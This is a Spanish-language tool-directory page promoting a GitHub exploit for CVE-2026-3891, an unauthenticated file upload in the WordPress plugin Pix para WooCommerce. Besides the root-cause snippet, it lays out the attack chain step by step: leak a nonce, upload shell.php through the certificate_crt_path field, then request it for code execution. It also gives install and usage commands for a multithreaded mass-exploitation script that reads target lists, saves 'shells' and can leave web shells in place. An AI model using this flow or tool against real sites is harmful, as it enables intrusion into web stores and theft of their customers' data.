Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/shinthink/cve-2026-3891
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix para WooCommerce: subida de archivos no autenticada a través del parámetro certificate_crt_path | CVSS 9.8

Ver Repositorio
412hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3891 — Pix para WooCommerce: Subida de Archivos No Autenticada y RCE

Fuga de Nonce → Subida de certificate_crt_path → Ejecución de Código


Resumen

CVE-2026-3891 es una vulnerabilidad de subida arbitraria de archivos no autenticada de severidad crítica (CVSS 9.8) en el plugin de WordPress Pix para WooCommerce (de linknacional) en versiones ≤ 1.5.0.

El manejador AJAX lkn_pix_for_woocommerce_c6_save_settings tiene:

  1. Sin comprobación de capacidad — cualquier visitante no autenticado puede invocarlo
  2. Sin validación del tipo de archivo — se acepta cualquier extensión a través del parámetro certificate_crt_path
  3. Un nonce válido es fácilmente obtenible a través del endpoint lkn_pix_for_woocommerce_generate_nonce sin autenticación

Los archivos subidos se almacenan en el directorio accesible vía web /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.

Versiones Afectadas

VersiónEstado
≤ 1.5.0Vulnerable
1.6.0+Corregida

Descubierta por: Alexis Lafontaine vía Wordfence (13 de marzo de 2026)


Mecanismo de la Vulnerabilidad

Causa Raíz

root@kitploit:~
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

Flujo del Ataque

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

Instalación

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

Uso

root@kitploit:~
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

Argumentos

root@kitploit:~
  -t, --target      Single target
  -f, --file        Target list
  -o, --output      Save RCE URLs
  --threads         Workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every request
  -v, --verbose     Verbose output

Aviso Legal

SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS. Los autores no asumen ninguna responsabilidad por el mal uso.


Referencias

RecursoEnlace
Aviso de Wordfencewordfence.com
Entrada NVDCVE-2026-3891
InvestigadorAlexis Lafontaine

No afiliado con linknacional ni con Pix for WooCommerce.

Descargar herramienta